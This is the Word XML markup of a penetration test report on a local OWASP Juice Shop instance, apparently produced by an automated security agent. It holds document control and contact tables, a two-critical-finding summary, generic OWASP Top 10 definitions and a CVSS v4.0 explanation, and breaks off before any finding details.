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Application Penetration Test Report — v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target System: OWASP Juice Shop v19.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performed by the OpenHack Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Issued by Jane Doe (jane.doe@openhack.sec)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2026-02-22</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Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to conduct an external IT security investigation. The subject of the investigation was the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“OWASP Juice Shop v19.1.1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The test was performed using a local instance of the application at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:3333</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9" w:name="document-control"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document Status</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2718"/>
        <w:gridCol w:w="5201"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Assessment Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Document Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenHack Security Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Strictly Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Project Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Version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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Final document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Assessor</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Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lead Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 123 4567</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">jane.doe@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">John Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 234 5678</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">john.smith@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Client</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Bjoern Kimminich</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Project Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 345 6789</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bjoern.kimminich@owasp.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10"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“ASSESSOR”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) has been commissioned by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CLIENT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to carry out a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration test of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Juice Shop v19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">application took place on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2026-02-22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this purpose, the web application, accessible at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3333</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, was tested from the perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As part of the test, a total of 2 vulnerabilities were identified: 2 critical, 0 high, 0 medium, 0 low, and 0 informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| High:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overview of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="3889"/>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pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</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r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">2</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10"/>
    <w:bookmarkStart w:id="15" w:name="X55a090500ae0830f4c87de9d9be2e793ad55880"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution of the Security Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="subject-under-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subject Under Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="scope"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scope for the assessment was the following targets:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="methodology"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security penetration test of the OWASP Juice Shop v19.1.1 took place on 2026-02-22.</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tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="5789"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>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Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Users can act outside their permissions, leading to unauthorized viewing, modification, or deletion of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Systems or cloud services are insecurely configured, e.g., through default passwords or unnecessarily enabled features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilities arise from compromised third-party code, libraries, or build pipelines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sensitive data is exposed through missing, weak, or incorrectly implemented encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attackers inject malicious commands (e.g., SQL or shell code) through input fields that the system erroneously executes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fundamental architectural flaws that exist before implementation make an application inherently insecure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Flaws in identity verification allow attackers to take over sessions or guess passwords (brute force).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lack of verification of code or data sources leads to acceptance of untrusted updates or serialization data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Logging &amp; Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attacks go undetected or responses are delayed due to missing logs or absent alert notifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Programs respond inadequately to unforeseen situations, which can lead to crashes or logic errors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14"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14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="20" w:name="risk-assessment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="17" w:name="cvss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk assessment of the vulnerabilities found is performed using the industry standard Common Vulnerability Scoring System v4.0 (hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CVSS”</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four groups:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Base”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Threat”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Environmental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Supplemental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. To determine the vulnerability scores, each group has its own rules. The values of the Base group are invariant in time and remain the same in different environments. In the Threat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 The Supplemental group provides additional context that does not modify the final score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The CVSS ratings are numerical values on a scale of 0.0 to 10.0, with the highest vulnerability of a system occurring at a value of 10.0. Our rating is based on the CVSS-B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Attack Requirements (AT)</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Vulnerable System Impact: Confidentiality (VC), Integrity (VI), Availability (VA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subsequent System Impact: Confidentiality (SC), Integrity (SI), Availability (SA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As penetration testers, we can only assess the general threats posed by a vulnerability (CVSS-B). However, we have no insight into the internal structures of our clients. Therefore, the assessment of the specific risks for the client’s systems and business processes must be done by the client. For this purpose, CVSS offers the Environmental metrics (CVSS-BE).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16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CVSS v4.0 Specification</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18"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v4.0 standard:</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Category Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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18"/>
    <w:bookmarkStart w:id="19"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19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="summary-of-findings"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1092"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="2048"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
